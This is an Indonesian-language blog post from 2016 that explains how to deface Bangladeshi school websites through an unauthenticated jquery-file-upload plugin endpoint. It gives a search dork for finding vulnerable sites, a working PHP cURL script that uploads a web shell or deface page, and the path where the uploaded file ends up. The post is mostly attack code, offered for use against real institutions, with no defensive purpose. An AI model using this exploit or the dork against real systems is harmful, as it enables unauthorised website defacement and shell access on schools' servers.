11 June 2016
hallo.
kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.
Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.
dork: Developed by exdmania
script:
<?phpPOC:
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
hasil:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/
Subscribe to:
Post Comments (Atom)
0 comments